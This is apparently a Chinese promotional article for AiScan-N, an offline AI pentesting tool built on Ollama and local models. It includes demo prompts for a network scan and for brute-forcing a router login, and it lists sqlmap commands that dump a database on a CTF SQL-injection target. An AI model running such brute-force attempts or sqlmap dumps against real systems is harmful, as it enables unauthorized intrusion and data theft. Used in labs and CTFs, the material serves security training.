点击上方蓝字 关注【渗透测试】不迷路
近几周,“AiScan‑N 能否离线使用?”、调用大模型必须联网吗?”等问题在私信里刷屏。答案很明确:可以完全不需要互联网!只要一台普通笔记本电脑(或工作站服务器),装好 Ollama 与 需要的大模型(DeepSeek‑R‑14B & Qwen3-Coder-30B),即可在本地完成内网资产发现、漏洞扫描、CTF题目进行解密、CTF网络安全大赛、风险评估等全流程。
📌 文章结构
- 环境准备
- 为什么要离线
- AiScan‑N + Ollama + DeepSeek‑R‑14B + Qwen3-Coder-30B
- 实战演示
- 常见问题 FAQ
- 后续拓展 & 小技巧
【兑奖需知】
1-关注公众号;
2-点赞、分享、推荐、喜欢(文章底部);
3-转发本文至朋友圈-兑奖时需出示朋友圈转发截图(不设分组屏蔽);
转发语——关注转发抽奖,速来
4-开奖前不得删除朋友圈,开奖后转发无效;
https://github.com/SecNN/AiScan-N
1️⃣ 环境准备
在一台笔记本电脑上完成部署。若无 GPU,可尝试将DeepSeek‑R‑14B 在 CPU 模式上运行,只是速度会慢。
操作系统:Microsoft Windows 11 家庭中文版, 版本 10.0.26100CPU:13th Gen Intel(R) Core(TM) i7-13700HX内存:32.0 GB显卡:NVIDIA GeForce RTX 4060 Laptop GPU执行命令:Kali Linux系统DeepSeek‑R‑14B && qwen3-coder:30b
2️⃣为什么要离线
- 数据安全:所有扫描日志、模型推理均在内部网络完成,绝不外泄。
- 合规友好:符合《网络安全法》《数据安全法》等监管要求。
- 低延迟:本地调用毫秒级响应,远超跨境 API 的网络往返。
- 成本可控:一次性模型部署,不再产生 API 计费。
一句话概括:在不联网的前提下,仍然可以拥有“ChatGPT 级别”的智能分析能力,这正是 AiScan‑N 与 DeepSeek‑R‑14B 的组合所实现的。
3️⃣ AiScan‑N + Ollama + DeepSeek‑R‑14B + Qwen3-Coder-30B
步骤1:在笔记本上安装Ollama和模型
# 1. 安装Ollamahttps://ollama.com/download# 2. 拉取DeepSeek-R模型(确保网络通畅)ollama pull deepseek-r1:14b# 3. 测试模型ollama run deepseek-r1:14b# 输入测试问题后按Ctrl+D退出
步骤2:在笔记本上部署AiScan-N
# 下载AiScan-N(根据你的笔记本系统选择版本)https://github.com/SecNN/AiScan-N.git在Kali Linux 运行AiScan-N-Kali-Server 开启服务sudo chmod +x AiScan-N-Kali-Server.bin # 赋予执行权限sudo ./AiScan-N-Kali-Server.bin -token 123456 # token中的123456可自定义
🚨token用于API接口鉴权的Bearer令牌,未设置 token,将受到被恶意漏洞利用的高危风险
运行之后显示如下:
至此,AiScan‑N、Ollama 与 DeepSeek‑R‑14B 已经在同一网络中互相可达,不需要任何外部网络。
4️⃣实战演示
扫描内网 192.168.0.0/24
你好,请帮我扫描内网 192.168.0.0/24 存活的主机
路由器管理登录处用户名密码枚举
你好,请对 http://192.168.0.1/login.html 进行渗透测试,暴力破解登录处的用户名口令
ollama pull qwen3-coder:30bollama run qwen3-coder:30b显卡:4060 是可以跑30B的
🎯本地大模型Qwen3-Coder-30B对图片隐写-Hex附加进行解密
对一个图片隐写进行分析,给出了一个zip文件的URL。需要先下载这个文件,然后进行分析。
对该图片隐写进行分析 http://192.168.0.160:8000/test.png
成功获取的flag值为:flag{haobachang_huanying_nin_123782934789372459}
解密过程
整个过程包括以下步骤:1. 图片下载从指定URL下载目标图片文件 test.png文件大小为80229字节,类型为PNG格式2. 初步分析使用 file 命令确认文件类型为PNG图像确认图片为正常的800x800像素RGBA格式3. 隐藏数据检测尝试使用 binwalk 分析图片中是否包含隐藏数据由于环境限制未能成功执行,但此步骤是标准分析流程4. 字符串提取与搜索使用 strings 命令提取图片中的所有可打印字符串通过 grep -i flag 过滤出包含flag关键字的文本行5. flag发现
🎯本地大模型Qwen3-Coder-30B对SQL注入漏洞注入
这是一个SQL注入练习平台,制定计划进行渗透测试并获取flag。AiScan-N将创建一个任务列表来组织攻击步骤。
提示词:
题目提示:该字符型 SQL 注入靶场模拟了含字符参数的漏洞查询场景,用户可通过构造包含特殊字符的注入语句,题目地址:http://q9pkouv.haobachang.loveli.com.cn:8888/search?name=111 ,这是一道CTF题目sQL 注入靶场,帮我分析并解出这道题目,找到flag后展示出来。
成功获取的flag值为:flag{247163cdd1ae41a99e445b18dfbdd084}
解密过程
第一步:初始探测目标URL: http://q9pkouv.haobachang.loveli.com.cn:8888/search?name=111工具: 使用 sqlmap 对目标URL进行SQL注入测试命令: sqlmap -u "http://q9pkouv.haobachang.loveli.com.cn:8888/search?name=111" --batch --dbs结果:确认目标存在SQL注入漏洞识别出多个注入点类型(布尔盲注、错误注入、时间盲注、UNION查询注入)发现目标数据库为MySQL列出所有可用数据库:information_schema,mydb,mysql,performance_schema,sql_injection_lab,sys第二步:数据库探索目标数据库: sql_injection_lab工具: 继续使用sqlmap 探索目标数据库中的表命令: sqlmap -u "http://q9pkouv.haobachang.loveli.com.cn:8888/search?name=111" --batch -D sql_injection_lab --tables结果:发现数据库sql_injection_lab 中包含两个表:flag 和 users第三步:表内容获取目标表: flag工具: 使用 sqlmap 导出 flag 表中的数据命令: sqlmap -u "http://q9pkouv.haobachang.loveli.com.cn:8888/search?name=111" --batch -D sql_injection_lab -T flag --dump结果:成功提取 flag 表中的数据表中包含一行记录,其中flag 字段值为:textflag{247163cdd1ae41a99e445b18dfbdd084}
小结:两者各有侧重,Qwen3‑Coder 30B 在代码质量和中文支持上更强,但资源需求高;DeepSeek‑R 14B 在速度、显存占用和多语言对话兼容性上更具优势。根据你的硬件条件和使用场景选择最合适的模型即可。
5️⃣常见问题 FAQ
本地离线大模型直接部署在你的电脑上,具体使用哪个版本取决于电脑的硬件配置。顾名思义,它是在本机上运行的大模型,运行效果自然与电脑的配置息息相关。
参考:显卡:4060 跑 qwen3-coder:30b
🎉 小结
AiScan‑N + Ollama + DeepSeek‑R‑14B 完全 离线,不需要任何外网访问,满足企业合规与数据安全的最高要求。
通过 本地 Nmap + 大模型推理,实现从原始端口指纹到 自然语言风险评估 的全链路自动化。
如果你正为“内部渗透测试需要联网调用 ChatGPT”而头疼,赶紧动手部署这套离线方案吧!
关注本公众号,后续我们会持续更新 模型微调实战、多模态扫描、企业级安全编排 等高级技巧,帮助你把 AI 真正落地到安全运营的每一个环节。
星球介绍
自研工具、二开工具、免杀工具、漏洞复现、教程等资源、漏洞挖掘分析、网络安全相关资料分享。
✅AiScan-N 使用反馈

